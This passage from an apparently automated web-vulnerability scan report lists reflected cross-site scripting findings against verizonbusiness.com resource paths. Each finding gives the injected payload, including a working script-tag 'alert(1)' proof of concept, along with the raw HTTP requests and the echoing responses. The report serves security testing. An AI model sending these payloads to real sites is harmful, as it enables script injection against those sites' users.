User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesaec4c";a3e76068129/1002a3a11-111-Blogs.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.707. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a11-111-Blogs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e848</script><script>alert(1)</script>4c6eff3d727 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a11-111-Blogs.xml7e848</script><script>alert(1)</script>4c6eff3d727 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "349a0e0cf18fc432925bc661136bb4ae"
Last-Modified: Wed, 17 Nov 2010 00:30:10 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27465
Date: Wed, 17 Nov 2010 00:30:10 GMT
Connection: close
Set-Cookie: BERT=VRID%3d4942fe9c-72f7-4a7a-9880-2974544a4023|VTID%3d1b51291c-cde5-418a-ad7a-617c0b117f7e|SX%3d1289955010|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:33:54 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:30:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a3a11-111-Blogs.xml7e848</script><script>alert(1)</script>4c6eff3d727</url>
...[SNIP]...

1.708. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a11-111-Blogs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27a77'%3ba4049658010 was submitted in the REST URL parameter 2. This input was echoed as 27a77';a4049658010 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/27a77'%3ba4049658010 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:15 GMT
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/27a77';a4049658010'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.709. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a12-111-Newsletter.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99991"%3bb1f7dc2f282 was submitted in the REST URL parameter 1. This input was echoed as 99991";b1f7dc2f282 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources99991"%3bb1f7dc2f282/1002a3a12-111-Newsletter.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:45 GMT
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources99991";b1f7dc2f282/1002a3a12-111-Newsletter.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.710. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a12-111-Newsletter.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ad20'%3b6a791f9fa26 was submitted in the REST URL parameter 1. This input was echoed as 3ad20';6a791f9fa26 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources3ad20'%3b6a791f9fa26/1002a3a12-111-Newsletter.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources3ad20';6a791f9fa26/1002a3a12-111-Newsletter.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.711. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a12-111-Newsletter.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71121'%3be4b8b1b10a5 was submitted in the REST URL parameter 2. This input was echoed as 71121';e4b8b1b10a5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a12-111-Newsletter.xml71121'%3be4b8b1b10a5 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:38 GMT
Content-Type: text/html
Content-Length: 40240
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/newsletters.xml71121';e4b8b1b10a5'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.712. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a12-111-Newsletter.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eed32"%3bd8eedb0d6d6 was submitted in the REST URL parameter 2. This input was echoed as eed32";d8eedb0d6d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a12-111-Newsletter.xmleed32"%3bd8eedb0d6d6 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40240
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/newsletters.xmleed32";d8eedb0d6d6";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.713. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a13-111-Thought+Leadership.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55187'%3bda6ecc09133 was submitted in the REST URL parameter 1. This input was echoed as 55187';da6ecc09133 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources55187'%3bda6ecc09133/1002a3a13-111-Thought+Leadership.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:53 GMT
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources55187';da6ecc09133/1002a3a13-111-Thought+Leadership.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.714. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a13-111-Thought+Leadership.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa73e"%3b7c21a186d3f was submitted in the REST URL parameter 1. This input was echoed as aa73e";7c21a186d3f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesaa73e"%3b7c21a186d3f/1002a3a13-111-Thought+Leadership.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesaa73e";7c21a186d3f/1002a3a13-111-Thought+Leadership.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.715. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a13-111-Thought+Leadership.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 694fd"%3bccaa30d1a0f was submitted in the REST URL parameter 2. This input was echoed as 694fd";ccaa30d1a0f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/694fd"%3bccaa30d1a0f HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/694fd";ccaa30d1a0f";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.716. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a13-111-Thought+Leadership.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8001'%3b296c07b7a7a was submitted in the REST URL parameter 2. This input was echoed as b8001';296c07b7a7a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/b8001'%3b296c07b7a7a HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/b8001';296c07b7a7a'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.717. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a14-111-Solutions+Briefs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a8e2"%3b49fbf1bc128 was submitted in the REST URL parameter 1. This input was echoed as 3a8e2";49fbf1bc128 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources3a8e2"%3b49fbf1bc128/1002a3a14-111-Solutions+Briefs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:05 GMT
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources3a8e2";49fbf1bc128/1002a3a14-111-Solutions+Briefs.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.718. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a14-111-Solutions+Briefs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daffc'%3ba2458a8f6e2 was submitted in the REST URL parameter 1. This input was echoed as daffc';a2458a8f6e2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesdaffc'%3ba2458a8f6e2/1002a3a14-111-Solutions+Briefs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:16 GMT
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
